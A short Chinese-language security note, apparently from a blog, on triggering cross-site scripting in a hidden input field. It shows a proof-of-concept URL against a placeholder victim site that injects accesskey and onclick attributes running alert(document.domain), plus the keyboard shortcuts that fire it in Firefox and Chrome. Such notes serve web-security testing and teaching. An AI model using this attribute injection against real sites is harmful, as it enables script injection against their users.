适用情况

<input type="hidden" name="returnurl" value="[USER INJECT]" />

那么访问http://victim/?value=xxx"οnclick="alert(document.domain)由于标签被隐藏是无法触发的。
所以需要用到accessKey这个小东西

<input type="hidden" name="returnurl" value="xxx" accesskey="X" onclick="alert(document.domain)" />

XSS 触发方法为：
Firefox下：shift+alt+X (测试成功)
Chrome：alt+X (最新版 Chrome 未测试成功)